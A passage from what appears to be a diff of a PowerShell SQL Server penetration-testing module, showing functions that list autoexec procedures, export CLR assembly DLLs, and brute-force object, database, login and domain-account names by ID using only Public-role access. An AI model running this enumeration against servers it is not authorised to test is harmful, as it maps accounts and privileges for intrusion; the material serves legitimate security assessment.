$false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Procedure name.')] + [string]$ProcedureName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Filter for procedures that include the keyword.')] + [string]$Keyword, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblProcs = New-Object -TypeName System.Data.DataTable + + # Setup routine name filter + if ($ProcedureName) + { + $ProcedureNameFilter = " AND ROUTINE_NAME like '$ProcedureName'" + } + else + { + $ProcedureNameFilter = '' + } + + # Setup ROUTINE_DEFINITION filter + if ($Keyword) + { + $KeywordFilter = " AND ROUTINE_DEFINITION like '%$Keyword%'" + } + else + { + $KeywordFilter = '' + } + } + + Process + { + # Parse ComputerName + If ($Instance) + { + $ComputerName = $Instance.split('\')[0].split(',')[0] + $Instance = $Instance + } + else + { + $ComputerName = $env:COMPUTERNAME + $Instance = '.\' + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose -Message "$Instance : Checking for autoexec stored procedures..." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Get role for each database + $TblDatabases | + ForEach-Object -Process { + # Get database name + $DbName = $_.DatabaseName + + # Define Query + $Query = " use [master]; + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + ROUTINE_CATALOG AS [DatabaseName], + ROUTINE_SCHEMA AS [SchemaName], + ROUTINE_NAME as [ProcedureName], + ROUTINE_TYPE as [ProcedureType], + ROUTINE_DEFINITION as [ProcedureDefinition], + SQL_DATA_ACCESS, + ROUTINE_BODY, + CREATED, + LAST_ALTERED, + b.is_ms_shipped, + b.is_auto_executed + FROM [INFORMATION_SCHEMA].[ROUTINES] a + JOIN [sys].[procedures] b + ON a.ROUTINE_NAME = b.name + WHERE 1=1 + AND is_auto_executed = 1 + $ProcedureNameFilter + $KeywordFilter" + + # Execute Query + $TblProcsTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + if(-not $TblProcsTemp){ + #Write-Verbose -Message "$Instance : No autoexec procedures found." + } + + # Append results + $TblProcs = $TblProcs + $TblProcsTemp + } + } + + End + { + # Return data + $TblProcs + } +} + + +#endregion + +######################################################################### +# +#region UTILITY FUNCTIONS +# +######################################################################### + + +# ---------------------------------- +# Get-SQLAssemblyFile +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLAssemblyFile +{ + <# + .SYNOPSIS + Returns assembly file information for each database. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER DatabaseName + Database name to filter for. + .PARAMETER DatabaseUser + Database user to filter for. + .PARAMETER NoDefaults + Only show information for non default databases. + .PARAMETER ExportFolder + Folder to export CLR DLL files to. + .PARAMETER AssemblyName + Filter for assembly names that contain the provided word. + + .EXAMPLE + PS C:\> Get-SQLAssemblyFile -Verbose -Instance SQLServer1\Instance1 | ft -AutoSize + VERBOSE: SQLServer1\Instance1 : Connection Success. + VERBOSE: SQLServer1\Instance1 : Grabbing assembly file information from master. + VERBOSE: SQLServer1\Instance1 : Grabbing assembly file information from tempdb. + VERBOSE: SQLServer1\Instance1 : Grabbing assembly file information from msdb. + + ComputerName Instance DatabaseName assembly_id name file_id content + ------------ -------- ------------ ----------- ---- ------- ------- + MSSQLSRV04 SQLServer1\Instance1 master 1 microsoft.sqlserver.types.dll 1 77 90 144 0 3 0 0 0 4 ... + MSSQLSRV04 SQLServer1\Instance1 tempdb 1 microsoft.sqlserver.types.dll 1 77 90 144 0 3 0 0 0 4 ... + MSSQLSRV04 SQLServer1\Instance1 msdb 1 microsoft.sqlserver.types.dll 1 77 90 144 0 3 0 0 0 4 ... + + + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLAssemblyfile -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server database name.')] + [string]$DatabaseName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Filter for filenames.')] + [string]$AssemblyName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Folder to export DLLs to.')] + [string]$ExportFolder, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Do not show database users associated with default databases.')] + [Switch]$NoDefaults, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblAssemblyFiles = New-Object -TypeName System.Data.DataTable + $null = $TblAssemblyFiles.Columns.Add('ComputerName') + $null = $TblAssemblyFiles.Columns.Add('Instance') + $null = $TblAssemblyFiles.Columns.Add('DatabaseName') + $null = $TblAssemblyFiles.Columns.Add('assembly_id') + $null = $TblAssemblyFiles.Columns.Add('assembly_name') + $null = $TblAssemblyFiles.Columns.Add('file_id') + $null = $TblAssemblyFiles.Columns.Add('file_name') + $null = $TblAssemblyFiles.Columns.Add('clr_name') + $null = $TblAssemblyFiles.Columns.Add('content') + $null = $TblAssemblyFiles.Columns.Add('permission_set_desc') + $null = $TblAssemblyFiles.Columns.Add('create_date') + $null = $TblAssemblyFiles.Columns.Add('modify_date') + $null = $TblAssemblyFiles.Columns.Add('is_user_defined') + } + + Process + { + # Note: Tables queried by this function typically require sysadmin or DBO privileges. + + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Get list of databases + if($NoDefaults) + { + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose -NoDefaults + } + else + { + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose + } + + # Setup assembly name filter + if($AssemblyName){ + $AssemblyNameQuery = "WHERE af.name LIKE '%$AssemblyName%'" + }else{ + $AssemblyNameQuery = "" + } + + # Get the privs for each database + $TblDatabases | + ForEach-Object -Process { + # Set DatabaseName filter + $DbName = $_.DatabaseName + + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Grabbing assembly file information from $DbName." + } + + # Define Query + $Query = "USE $DbName; + SELECT af.assembly_id, + a.name as assembly_name, + af.file_id, + af.name as file_name, + a.clr_name, + af.content, + a.permission_set_desc, + a.create_date, + a.modify_date, + a.is_user_defined + FROM sys.assemblies a INNER JOIN sys.assembly_files af ON a.assembly_id = af.assembly_id + $AssemblyNameQuery" + + # Execute Query + $TblAssemblyFilesTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Add each result to table + $TblAssemblyFilesTemp | + ForEach-Object -Process { + + # Add results to table + $null = $TblAssemblyFiles.Rows.Add( + [string]$ComputerName, + [string]$Instance, + [string]$DbName, + [string]$_.assembly_id, + [string]$_.assembly_name, + [string]$_.file_id, + [string]$_.file_name, + [string]$_.clr_name, + [string]$_.content, + [string]$_.permission_set_desc, + [string]$_.create_date, + [string]$_.modify_date, + [string]$_.is_user_defined) + + # Export dll + if($ExportFolder){ + + # Create export folder + $ExportOutputFolder = "$ExportFolder\CLRExports" + If ((test-path $ExportOutputFolder) -eq $False){ + Write-Verbose "$instance : Creating export folder: $ExportOutputFolder" + $null = New-Item -Path "$ExportOutputFolder" -type directory + } + + # Create instance subfolder if it doesnt exist + $InstanceClean = $Instance -replace('\\','_') + $ServerPath = "$ExportOutputFolder\$InstanceClean" + If ((test-path $Serverpath) -eq $False){ + Write-Verbose "$instance : Creating server folder: $ServerPath" + $null = New-Item -Path "$ServerPath" -type directory + } + + # Create database subfolder if it doesnt exist + $Databasepath = "$ServerPath\$DbName" + If ((test-path $Databasepath) -eq $False){ + Write-Verbose "$instance : Creating database folder: $Databasepath" + $null = New-Item $Databasepath -type directory + } + + # Create dll file if it doesnt exist + $CLRFilename = $_.file_name + Write-Verbose "$instance : - Exporting $CLRFilename.dll" + $FullExportPath = "$Databasepath\$CLRFilename.dll" + $_.content | Set-Content -Encoding Byte $FullExportPath + + } + } + } + } + + End + { + # Return data + $TblAssemblyFiles + } +} + + +# ---------------------------------- +# Get-SQLFuzzObjectName +# ---------------------------------- +# Author: Scott Sutherland +# Reference: https://raresql.com/2013/01/29/sql-server-all-about-object_id/ +# Reference: https://social.technet.microsoft.com/Forums/forefront/en-US/f73c2115-57f7-4cec-a95b-00c2d8252ace/objectid-recycled-?forum=transactsql +Function Get-SQLFuzzObjectName +{ + <# + .SYNOPSIS + Enumerates objects based on object id using OBJECT_NAME() and only the Public role. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER StartId + Principal ID to start fuzzing with. + .PARAMETER EndId + Principal ID to stop fuzzing with. + .EXAMPLE + PS C:\> Get-SQLFuzzObjectName -Instance SQLServer1\STANDARDDEV2014 | Select-Object -First 5 + + ComputerName Instance ObjectId ObjectName + ------------ -------- -------- ---------- + SQLServer1 SQLServer1\STANDARDDEV2014 3 sysrscols + SQLServer1 SQLServer1\STANDARDDEV2014 5 sysrowsets + SQLServer1 SQLServer1\STANDARDDEV2014 6 sysclones + SQLServer1 SQLServer1\STANDARDDEV2014 7 sysallocunits + SQLServer1 SQLServer1\STANDARDDEV2014 8 sysfiles1 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'Principal ID to start fuzzing with.')] + [string]$StartId = 1, + + [Parameter(Mandatory = $false, + HelpMessage = 'Principal ID to stop fuzzing on.')] + [string]$EndId = 300, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblFuzzedObjects = New-Object -TypeName System.Data.DataTable + } + + Process + { + # All user defined objects are assigned a positive object ID plus system tables. + # Apart from these objects, the rest of the system objects are assigned negative object IDs. + # This object_id comes from the primary key of system table sys.sysschobjs.The column name is id, int data type and it is not an identity column + # If you create a new object in the database, the first ID will always be 2073058421 in SQL SERVER 2005 and 245575913 in SQL SERVER 2012. + # The object_ID increment counter for user defined objects will add 16000057 + Last user defined object_ID and will give you a new ID. + <# IThis object_id comes from the primary key of system table sys.sysschobjs. The new object_id will increase 16000057 (a prime number) from + last object_id. When the last object_id +16000057 is over the int maximum ( 2147483647), it will start with a new number before the difference + between the new bigint number and the maximum int. This cycle will generate 134 or 135 new object_id for each cycle. The system has a maximum + number of objects, which is 2147483647. + The object ID is only unique within each database. + #> + + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose -Message "$Instance : Enumerating objects from object IDs..." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Fuzz from StartId to EndId + $StartId..$EndId | + ForEach-Object -Process { + # Define Query + $Query = "SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + '$_' as [ObjectId], + OBJECT_NAME($_) as [ObjectName]" + + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + $ObjectName = $TblResults.ObjectName + if( -not $SuppressVerbose) + { + if($ObjectName.length -ge 2) + { + Write-Verbose -Message "$Instance : - Object ID $_ resolved to: $ObjectName" + } + else + { + Write-Verbose -Message "$Instance : - Object ID $_ resolved to: " + } + } + + # Append results + $TblFuzzedObjects = $TblFuzzedObjects + $TblResults + } + } + + End + { + # Return data + $TblFuzzedObjects | Where-Object -FilterScript { + $_.ObjectName.length -ge 2 + } + } +} + + +# ---------------------------------- +# Get-SQLFuzzDatabaseName +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLFuzzDatabaseName +{ + <# + .SYNOPSIS + Enumerates databases based on database id using DB_NAME() and only the Public role. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER StartId + Principal ID to start fuzzing with. + .PARAMETER EndId + Principal ID to stop fuzzing with. + .EXAMPLE + PS C:\> Get-SQLFuzzDatabaseName -Instance SQLServer1\STANDARDDEV2014 | Select-Object -First 5 + + ComputerName Instance DatabaseId DatabaseName + ------------ -------- ---------- ------------ + SQLServer1 SQLServer1\STANDARDDEV2014 1 master + SQLServer1 SQLServer1\STANDARDDEV2014 2 tempdb + SQLServer1 SQLServer1\STANDARDDEV2014 3 model + SQLServer1 SQLServer1\STANDARDDEV2014 4 msdb + SQLServer1 SQLServer1\STANDARDDEV2014 5 ReportServer$STANDARDDEV2014 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'Principal ID to start fuzzing with.')] + [string]$StartId = 1, + + [Parameter(Mandatory = $false, + HelpMessage = 'Principal ID to stop fuzzing on.')] + [string]$EndId = 300, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblFuzzedDbs = New-Object -TypeName System.Data.DataTable + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose -Message "$Instance : Enumerating database names from database IDs..." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Fuzz from StartId to EndId + $StartId..$EndId | + ForEach-Object -Process { + # Define Query + $Query = "SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + '$_' as [DatabaseId], + DB_NAME($_) as [DatabaseName]" + + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + $DatabaseName = $TblResults.DatabaseName + if($DatabaseName.length -ge 2) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : - ID $_ - Resolved to: $DatabaseName" + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : - ID $_ - Resolved to:" + } + } + + # Append results + $TblFuzzedDbs = $TblFuzzedDbs + $TblResults + } + } + + End + { + # Return data + $TblFuzzedDbs | Where-Object -FilterScript { + $_.DatabaseName.length -ge 2 + } + } +} + + +# ---------------------------------- +# Get-SQLFuzzServerLogin +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLFuzzServerLogin +{ + <# + .SYNOPSIS + Enumerates SQL Server Logins based on login id using SUSER_NAME() and only the Public role. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER FuzzNum + The number of Principal IDs to fuzz during blind SQL login enumeration as a least privilege login. + .PARAMETER GetRole + Checks if the principal name is a role, SQL login, or Windows account. + .EXAMPLE + PS C:\> Get-SQLFuzzServerLogin -Instance SQLServer1\STANDARDDEV2014 -StartId 1 -EndId 500 | Select-Object -First 40 + + ComputerName Instance PrincipalId PrincipleName + ------------ -------- ---------- ------------- + SQLServer1 SQLServer1\STANDARDDEV2014 1 sa + SQLServer1 SQLServer1\STANDARDDEV2014 2 public + SQLServer1 SQLServer1\STANDARDDEV2014 3 sysadmin + SQLServer1 SQLServer1\STANDARDDEV2014 4 securityadmin + SQLServer1 SQLServer1\STANDARDDEV2014 5 serveradmin + SQLServer1 SQLServer1\STANDARDDEV2014 6 setupadmin + SQLServer1 SQLServer1\STANDARDDEV2014 7 processadmin + SQLServer1 SQLServer1\STANDARDDEV2014 8 diskadmin + SQLServer1 SQLServer1\STANDARDDEV2014 9 dbcreator + SQLServer1 SQLServer1\STANDARDDEV2014 10 bulkadmin + SQLServer1 SQLServer1\STANDARDDEV2014 101 ##MS_SQLResourceSigningCertificate## + SQLServer1 SQLServer1\STANDARDDEV2014 102 ##MS_SQLReplicationSigningCertificate## + SQLServer1 SQLServer1\STANDARDDEV2014 103 ##MS_SQLAuthenticatorCertificate## + SQLServer1 SQLServer1\STANDARDDEV2014 105 ##MS_PolicySigningCertificate## + SQLServer1 SQLServer1\STANDARDDEV2014 106 ##MS_SmoExtendedSigningCertificate## + SQLServer1 SQLServer1\STANDARDDEV2014 121 ##Agent XPs## + SQLServer1 SQLServer1\STANDARDDEV2014 122 ##SQL Mail XPs## + SQLServer1 SQLServer1\STANDARDDEV2014 123 ##Database Mail XPs## + SQLServer1 SQLServer1\STANDARDDEV2014 124 ##SMO and DMO XPs## + SQLServer1 SQLServer1\STANDARDDEV2014 125 ##Ole Automation Procedures## + SQLServer1 SQLServer1\STANDARDDEV2014 126 ##Web Assistant Procedures## + SQLServer1 SQLServer1\STANDARDDEV2014 127 ##xp_cmdshell## + SQLServer1 SQLServer1\STANDARDDEV2014 128 ##Ad Hoc Distributed Queries## + SQLServer1 SQLServer1\STANDARDDEV2014 129 ##Replication XPs## + SQLServer1 SQLServer1\STANDARDDEV2014 257 ##MS_PolicyTsqlExecutionLogin## + SQLServer1 SQLServer1\STANDARDDEV2014 259 Domain\User + SQLServer1 SQLServer1\STANDARDDEV2014 260 NT SERVICE\SQLWriter + SQLServer1 SQLServer1\STANDARDDEV2014 261 NT SERVICE\Winmgmt + SQLServer1 SQLServer1\STANDARDDEV2014 262 NT Service\MSSQL$STANDARDDEV2014 + SQLServer1 SQLServer1\STANDARDDEV2014 263 NT AUTHORITY\SYSTEM + SQLServer1 SQLServer1\STANDARDDEV2014 264 NT SERVICE\SQLAgent$STANDARDDEV2014 + SQLServer1 SQLServer1\STANDARDDEV2014 265 NT SERVICE\ReportServer$STANDARDDEV2014 + SQLServer1 SQLServer1\STANDARDDEV2014 266 ##MS_PolicyEventProcessingLogin## + SQLServer1 SQLServer1\STANDARDDEV2014 267 ##MS_AgentSigningCertificate## + SQLServer1 SQLServer1\STANDARDDEV2014 268 MySQLUser1 + SQLServer1 SQLServer1\STANDARDDEV2014 270 MySQLUser2 + SQLServer1 SQLServer1\STANDARDDEV2014 271 MySQLUser3 + SQLServer1 SQLServer1\STANDARDDEV2014 272 MySysadmin1 + SQLServer1 SQLServer1\STANDARDDEV2014 273 Domain\User2 + SQLServer1 SQLServer1\STANDARDDEV2014 274 MySysadmin2 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'Number of Principal IDs to fuzz.')] + [string]$FuzzNum = 10000, + + [Parameter(Mandatory = $false, + HelpMessage = 'Try to determine if the principal type is role, SQL login, or Windows account via error analysis of sp_defaultdb.')] + [switch]$GetPrincipalType, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Table for output + $TblFuzzedLogins = New-Object -TypeName System.Data.DataTable + $null = $TblFuzzedLogins.Columns.add('ComputerName') + $null = $TblFuzzedLogins.Columns.add('Instance') + $null = $TblFuzzedLogins.Columns.add('PrincipalId') + $null = $TblFuzzedLogins.Columns.add('PrincipleName') + if($GetPrincipalType) + { + $null = $TblFuzzedLogins.Columns.add('PrincipleType') + } + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose -Message "$Instance : Enumerating principal names from $FuzzNum principal IDs.." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Define Query + # Reference: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7 + $Query = " + SELECT + '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + n [PrincipalId], SUSER_NAME(n) as [PrincipleName] + from ( + select top $FuzzNum row_number() over(order by t1.number) as N + from master..spt_values t1 + cross join master..spt_values t2 + ) a + where SUSER_NAME(n) is not null" + + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Process results + $TblResults | + ForEach-Object { + + # check if principal is role, sql login, or windows account + $PrincipalName = $_.PrincipleName + $PrincipalId = $_.PrincipalId + + if($GetPrincipalType) + { + $RoleCheckQuery = "EXEC master..sp_defaultdb '$PrincipalName', 'NOTAREALDATABASE1234ABCD'" + $RoleCheckResults = Get-SQLQuery -Instance $Instance -Query $RoleCheckQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -ReturnError + + # Check the error message for a signature that means the login is real + if (($RoleCheckResults -like '*NOTAREALDATABASE*') -or ($RoleCheckResults -like '*alter the login*')) + { + + if($PrincipalName -like '*\*') + { + $PrincipalType = 'Windows Account' + } + else + { + $PrincipalType = 'SQL Login' + } + } + else + { + $PrincipalType = 'SQL Server Role' + } + } + + # Add to result set + if($GetPrincipalType) + { + $null = $TblFuzzedLogins.Rows.Add($ComputerName, $Instance, $PrincipalId, $PrincipalName, $PrincipalType) + } + else + { + $null = $TblFuzzedLogins.Rows.Add($ComputerName, $Instance, $PrincipalId, $PrincipalName) + } + + } + } + + End + { + # Return data + $TblFuzzedLogins | Where-Object -FilterScript { + $_.PrincipleName.length -ge 2 + } + + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Complete." + } + } +} + + +# ---------------------------------- +# Get-SQLFuzzDomainAccount +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLFuzzDomainAccount +{ + <# + .SYNOPSIS + Enumerates domain groups, computer accounts, and user accounts based on domain RID using SUSER_SNAME() and only the Public role. + Note: In a typical domain 10000 or more is recommended for the EndId. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER Domain + Set a custom domain for user enumeration. Typically used to target trusted domains. + .PARAMETER StartId + RID to start fuzzing with. + .PARAMETER EndId + RID to stop fuzzing with. + .EXAMPLE + PS C:\> Get-SQLFuzzDomainAccount -Instance SQLServer1\STANDARDDEV2014 -Verbose -StartId 500 -EndId 1500 -Domain TrustedDomainName + .EXAMPLE + PS C:\> Get-SQLFuzzDomainAccount -Instance SQLServer1\STANDARDDEV2014 -Verbose -StartId 500 -EndId 1500 + + VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success. + VERBOSE: SQLServer1\STANDARDDEV2014 : Enumerating Domain accounts from the SQL Server's default domain... + VERBOSE: SQLServer1\STANDARDDEV2014 : RID 0x010500000000000515000000A132413243431431326051C0f4010000 (500) Resolved to: Domain\Administrator + VERBOSE: SQLServer1\STANDARDDEV2014 : RID 0x010500000000000515000000A132413243431431326051C0f5010000 (501) Resolved to: Domain\Guest + VERBOSE: SQLServer1\STANDARDDEV2014 : RID 0x010500000000000515000000A132413243431431326051C0f6010000 (502) Resolved to: Domain\krbtgt + [TRUNCATED] + + ComputerName Instance DomainAccount + ------------ -------- ------------- + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Administrator + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Guest + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\krbtgt + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Domain Guests + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Domain Computers + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Domain Controllers + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Cert Publishers + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Schema Admins + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Enterprise Admins + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Group Policy Creator Owners + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Read-only Domain Controllers + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Cloneable Domain Controllers + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Protected Users + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\RAS and IAS Servers + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Allowed RODC Password Replication Group + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Denied RODC Password Replication Group + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\HelpServicesGroup + + [TRUNCATED] + + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\MyUser + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\MyDAUser + SQLServer1 SQLServer1\STANDARDDEV2014 Domain\MyEAUser + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + 